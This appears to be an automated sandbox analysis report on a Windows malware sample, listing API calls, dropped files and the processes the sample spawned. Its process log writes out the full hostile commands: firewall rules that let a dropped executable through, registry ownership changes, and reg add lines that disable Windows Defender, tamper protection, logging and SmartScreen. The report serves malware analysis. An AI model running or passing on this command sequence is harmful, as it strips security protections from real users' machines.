Code function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040571B

Source: reg.exe

Process created: 76

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403532

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_00406DC6	0_2_00406DC6
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_0040759D	0_2_0040759D
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF6868213F0	7_2_00007FF6868213F0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68684A350	7_2_00007FF68684A350
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF6868694BC	7_2_00007FF6868694BC
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68685E4B0	7_2_00007FF68685E4B0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68686C28F	7_2_00007FF68686C28F
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68684BC40	7_2_00007FF68684BC40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686856B2A	7_2_00007FF686856B2A
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68687B74C	7_2_00007FF68687B74C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68687C76C	7_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68685A630	7_2_00007FF68685A630
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686837580	7_2_00007FF686837580
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686879718	7_2_00007FF686879718
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68682F650	7_2_00007FF68682F650
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68687669C	7_2_00007FF68687669C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF6868363E0	7_2_00007FF6868363E0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686873410	7_2_00007FF686873410
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686858360	7_2_00007FF686858360
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68686F394	7_2_00007FF68686F394
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68684E530	7_2_00007FF68684E530
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686874218	7_2_00007FF686874218
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68687A31C	7_2_00007FF68687A31C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68685C250	7_2_00007FF68685C250
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68686BFE8	7_2_00007FF68686BFE8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68687DFF0	7_2_00007FF68687DFF0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68687EF6C	7_2_00007FF68687EF6C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68686EF30	7_2_00007FF68686EF30
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686883C64	7_2_00007FF686883C64
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68682E9D0	7_2_00007FF68682E9D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68685F9C0	7_2_00007FF68685F9C0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68686EA10	7_2_00007FF68686EA10
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686821A30	7_2_00007FF686821A30
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686847B10	7_2_00007FF686847B10
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68686FB00	7_2_00007FF68686FB00
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF68682CB20	7_2_00007FF68682CB20
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68687B74C	11_2_00007FF68687B74C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF6868213F0	11_2_00007FF6868213F0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68684A350	11_2_00007FF68684A350
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF6868694BC	11_2_00007FF6868694BC
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68685E4B0	11_2_00007FF68685E4B0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68686C28F	11_2_00007FF68686C28F
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68684BC40	11_2_00007FF68684BC40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686856B2A	11_2_00007FF686856B2A
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68687C76C	11_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68685A630	11_2_00007FF68685A630
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686837580	11_2_00007FF686837580
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686879718	11_2_00007FF686879718
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68682F650	11_2_00007FF68682F650
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68687669C	11_2_00007FF68687669C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF6868363E0	11_2_00007FF6868363E0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686873410	11_2_00007FF686873410
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686858360	11_2_00007FF686858360
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68686F394	11_2_00007FF68686F394
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68684E530	11_2_00007FF68684E530
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686874218	11_2_00007FF686874218
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68687A31C	11_2_00007FF68687A31C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68685C250	11_2_00007FF68685C250
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68686BFE8	11_2_00007FF68686BFE8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68687DFF0	11_2_00007FF68687DFF0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68687EF6C	11_2_00007FF68687EF6C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68686EF30	11_2_00007FF68686EF30
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686883C64	11_2_00007FF686883C64
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68682E9D0	11_2_00007FF68682E9D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68685F9C0	11_2_00007FF68685F9C0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68686EA10	11_2_00007FF68686EA10
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686821A30	11_2_00007FF686821A30
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686847B10	11_2_00007FF686847B10
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68686FB00	11_2_00007FF68686FB00
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF68682CB20	11_2_00007FF68682CB20

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe 5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll D115BCE0A787B4F895E700EFE943695C8F1087782807D91D831F6015B0F98774

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF686877998 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF686829D20 appears 188 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF686829CB0 appears 138 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF686829B00 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF686833F80 appears 232 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF68682AA20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF686834170 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF68682AC70 appears 186 times
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: String function: 00007FF6868294C0 appears 170 times

Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameselfdel.dllJ vs 4hIPvzV6a2.exe
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSetACL.exe. vs 4hIPvzV6a2.exe

Source: 4hIPvzV6a2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f

Source: classification engine

Classification label: mal96.phis.evad.winEXE@154/10@0/0

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF68683BF60 GetLastError,#13,SysStringByteLen,SysAllocStringByteLen,SysFreeString,LoadLibraryExW,LoadLibraryExW,FormatMessageW,LocalFree,FreeLibrary,_invalid_parameter_noinfo_noreturn,

7_2_00007FF68683BF60

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Code function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_00403532
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686843FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,	7_2_00007FF686843FD8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686843D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,	7_2_00007FF686843D1B
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF686843A5E AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,	7_2_00007FF686843A5E
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 7_2_00007FF6868342A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	7_2_00007FF6868342A0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686843FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,	11_2_00007FF686843FD8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686843D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,	11_2_00007FF686843D1B
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF686843A5E AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,	11_2_00007FF686843A5E
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Code function: 11_2_00007FF6868342A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF6868342A0

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

Code function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004049C7

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

Code function: 0_2_004021AF CoCreateInstance,

0_2_004021AF

Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe

Code function: 7_2_00007FF686834810 FindResourceW,LoadResource,LockResource,FreeResource,_invalid_parameter_noinfo_noreturn,

7_2_00007FF686834810

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

File created: C:\Users\user\AppData\Local\Temp\nsv4B5.tmp

Jump to behavior

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat

Source: 4hIPvzV6a2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4hIPvzV6a2.exe	ReversingLabs: Detection: 36%
Source: 4hIPvzV6a2.exe	Virustotal: Detection: 43%

Source: SetACL64.exe	String found in binary or memory: -help
Source: SetACL64.exe	String found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exe	String found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exe	String found in binary or memory: -help
Source: SetACL64.exe	String found in binary or memory: Type 'SetACL -help' for help.
Source: SetACL64.exe	String found in binary or memory: Type 'SetACL -help' for help.

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe

File read: C:\Users\user\Desktop\4hIPvzV6a2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4hIPvzV6a2.exe "C:\Users\user\Desktop\4hIPvzV6a2.exe"
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
